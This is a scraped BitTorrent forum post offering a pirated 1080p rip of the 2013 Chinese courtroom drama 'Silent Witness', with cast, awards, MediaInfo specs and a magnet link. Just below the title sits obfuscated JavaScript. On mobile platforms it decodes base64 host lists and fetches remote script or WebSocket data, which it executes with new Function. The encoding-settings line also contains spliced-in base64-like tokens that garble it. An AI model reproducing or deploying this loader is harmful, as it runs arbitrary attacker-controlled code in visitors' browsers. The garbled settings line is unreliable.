全民目击 Silent.Witness.2013.CHINESE.1080p.BluRay.x264.DD5.1-LHD 8.67GB

版主小s 1月前 257

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 全民目击 / Silent Witness
◎年  代 2013
◎产  地 中国大陆
◎类  别 剧情 / 悬疑 / 犯罪
◎语  言 汉语普通话
◎上映日期 2013-09-13(中国大陆)
◎IMDb链接  https://www.imdb.com/title/tt3204696/
◎豆瓣评分 7.8/10 (288332人评价)
◎豆瓣链接  https://movie.douban.com/subject/11510624/
◎片  长 119分钟
◎导  演 非行 Fei Xing (id:1320824)
◎编  剧 非行 Fei Xing (id:1320824)
◎演  员 孙红雷 Honglei Sun (id:1053581)
       余男 Nan Yu (id:1050430)
       郭富城 Aaron Kwok (id:1041390)
       邓家佳 Jiajia Deng (id:1274361)
       赵立新 Lixin Zhao (id:1312817)
       佟丽娅 Liya Tong (id:1275756)
       倪虹洁 Hongjie Ni (id:1274649)
       陈思诚 Sicheng Chen (id:1274763)
       周韦彤 Cica Zhou (id:1275947)
       廖晓琴 Xiaoqin Liao (id:1315475)
       谭松韵 Songyun Tan (id:1318061)
       丁子烁 Zishuo Ding (id:1363782)
       李兰迪 Landy Li (id:1330228)
       高大伟 Dawei Gao (id:1328992)
       李沁谣 Maggie Lee (id:1322406)
       罗悠月 Youyue Luo (id:1363645)
       赵彦乔 Yanqiao Zhao (id:1356459)
       李子游 Ziyou Li (id:1386175)
       纪姿含 Zihan Ji (id:1342370)
       李宗雷 Zonglei Li (id:1350373)
       戴墨 Mo Dai (id:1324615)
       张羽 Yu Zhang (id:1323186)
       张旭 Xu Zhang (id:1320543)
       郭东 Dong Guo (id:1339963)
       谢天翔 Tianxiang Xie (id:1371076)
       喻为星 Victor Yu (id:1375385)
       吕赢 Ying Lü (id:1386811)
       杜笃之 Du-Che Tu (id:1275159)

◎标  签 悬疑 / 孙红雷 / 犯罪 / 中国电影 / 国产 / 郭富城 / 父爱 / 大陆

◎简  介
  林泰(孙红雷 饰)是当地名噪一方的富豪,近来正筹备自己人生中的另一件大事,与钟爱多年的女友结婚。不料此时传来噩耗,准新娘被人杀死在公寓的地下停车场,林泰闻讯如雷击顶。警方把怀疑的目光瞄向了他的独女林萌萌(邓家佳 饰),检方提起诉讼后,林泰花重金聘请著名律师周莉(余男 饰)为其女辩护,周莉曾为诸多有名的案件做过代理人,对打赢这场官司信心满满,庭审前,做了大量案头工作。公诉方派出的则是大名鼎鼎的检察官童涛(郭富城 饰),他的公诉犀利坚锐、一语中的。庭审开始后,控辩双方剑拔驽张,火药味十足,但随着审理的进一步深入,罪案越发扑朔迷离,似进入一条看不到边际的死穴......

◎获奖情况 (共7项)
  第30届中国电影金鸡奖 (2015)
  最佳女配角
   └──邓家佳 (id:1274361)

  第32届大众电影百花奖 (2014)
  最佳女主角(提名)
   └──余男 (id:1050430)
  最佳女配角
   └──邓家佳 (id:1274361)
  最佳新人(提名)
   └──丁子烁 (id:1363782)

  第4届豆瓣电影鑫像奖 (2014)
  鑫豆单元 最佳影片(华语)(提名)
  鑫豆单元 最佳导演(华语)(提名)
   └──非行 (id:1320824)
  鑫豆单元 最佳男演员(华语)(提名)
   └──孙红雷 (id:1053581)

  1. Video

  2. ID                                       : 1

  3. Format                                   : AVC

  4. Format/Info                              : Advanced Video Codec

  5. Format profile                           : [email protected]

  6. Format settings                          : CABAC / 9 Ref Frames

  7. Format settings, CABAC                   : Yes

  8. Format settings, Reference frames        : 9 frames

  9. Codec ID                                 : V_MPEG4/ISO/AVC

  10. Duration                                 : 1 h 54 min

  11. Bit rate                                 : 10 000 kb/s

  12. Width                                    : 1 920 pixels

  13. Height                                   : 816 pixels

  14. Display aspect ratio                     : 2.35:1

  15. Frame rate mode                          : Constant

  16. Frame rate                               : 24.000 FPS

  17. Color space                              : YUV

  18. Chroma subsampling                       : 4:2:0

  19. Bit depth                                : 8 bits

  20. Scan type                                : Progressive

  21. Bits/(Pixel*Frame)                       : 0.266

  22. Stream size                              : 8.02 GiB (92%)

  23. Writing library                          : x264 core 142 r2431+42 c69a006 tMod [[email protected]:2:0 X86_64]

  24. Encoding settings                        : cabac=1 / ref=9 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=0 / mixed_ref=1 / me_range=32 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=0 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=10 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=500 / keyint_min=24 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc=2pass / mbtree=0 / bitrate=10000 / ratetol=1.0 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / cplxblur=20.0 / qblur=0.5 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  25. Default                                  : Yes

  26. Forced                                   : No


  27. Audio

  28. ID                                       : 2

  29. Format                                   : E-AC-3

  30. Format/Info                              : Enhanced AC-3

  31. Commercial name                          : Dolby Digital Plus

  32. Codec ID                                 : A_EAC3

  33. Duration                                 : 1 h 54 min

  34. Bit rate mode                            : Constant

  35. Bit rate                                 : 768 kb/s

  36. Channel(s)                               : 6 channels

  37. Channel layout                           : L R C LFE Ls Rs

  38. Sampling rate                            : 48.0 kHz

  39. Frame rate                               : 62.500 FPS (768 SPF)

  40. Compression mode                         : Lossy

  41. Stream size                              : 631 MiB (7%)

  42. Title                                    : Mandarin

  43. Language                                 : Chinese

  44. Service kind                             : Complete Main

  45. Default                                  : Yes

  46. Forced                                   : No


  47. Text #1

  48. ID                                       : 3

  49. Format                                   : UTF-8

  50. Codec ID                                 : S_TEXT/UTF8

  51. Codec ID/Info                            : UTF-8 Plain Text

  52. Duration                                 : 1 h 47 min

  53. Bit rate                                 : 64 b/s

  54. Count of elements                        : 1799

  55. Stream size                              : 50.8 KiB (0%)

  56. Title                                    : SRT

  57. Language                                 : English

  58. Default                                  : Yes

  59. Forced                                   : No


  60. Text #2

  61. ID                                       : 4

  62. Format                                   : PGS

  63. Muxing mode                              : zlib

  64. Codec ID                                 : S_HDMV/PGS

  65. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  66. Duration                                 : 1 h 47 min

  67. Bit rate                                 : 39.6 kb/s

  68. Count of elements                        : 2991

  69. Stream size                              : 30.6 MiB (0%)

  70. Title                                    : CHT/PGS

  71. Language                                 : Chinese

  72. Default                                  : No

  73. Forced                                   : No


  74. Text #3

  75. ID                                       : 5

  76. Format                                   : PGS

  77. Muxing mode                              : zlib

  78. Codec ID                                 : S_HDMV/PGS

  79. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration                                 : 1 h 47 min

  81. Bit rate                                 : 38.8 kb/s

  82. Count of elements                        : 2989

  83. Stream size                              : 29.9 MiB (0%)

  84. Title                                    : CHS/PGS

  85. Language                                 : Chinese

  86. Default                                  : No

  87. Forced                                   : No


  88. Text #4

  89. ID                                       : 6

  90. Format                                   : PGS

  91. Muxing mode                              : zlib

  92. Codec ID                                 : S_HDMV/PGS

  93. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  94. Duration                                 : 1 h 47 min

  95. Bit rate                                 : 50.8 kb/s

  96. Count of elements                        : 2991

  97. Stream size                              : 39.1 MiB (0%)

  98. Title                                    : ENG/PGS

  99. Language                                 : English

  100. Default                                  : No

  101. Forced                                   : No


  102. Menu

  103. 00:00:00.000                             : :Chapter 01

  104. 00:08:22.833                             : :Chapter 02

  105. 00:19:18.583                             : :Chapter 03

  106. 00:29:26.208                             : :Chapter 04

  107. 00:37:04.792                             : :Chapter 05

  108. 00:48:04.958                             : :Chapter 06

  109. 00:57:34.625                             : :Chapter 07

  110. 01:06:05.417                             : :Chapter 08

  111. 01:16:39.958                             : :Chapter 09

  112. 01:25:26.583                             : :Chapter 10

  113. 01:35:38.708                             : :Chapter 11

  114. 01:44:18.833                             : :Chapter 12

复制代码




TAGS 剧情 悬疑 犯罪

磁力链:
  • magnet:?xt=urn:btih:8E517FA1EFE34221E677EB1A55E810C99C043EAD
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖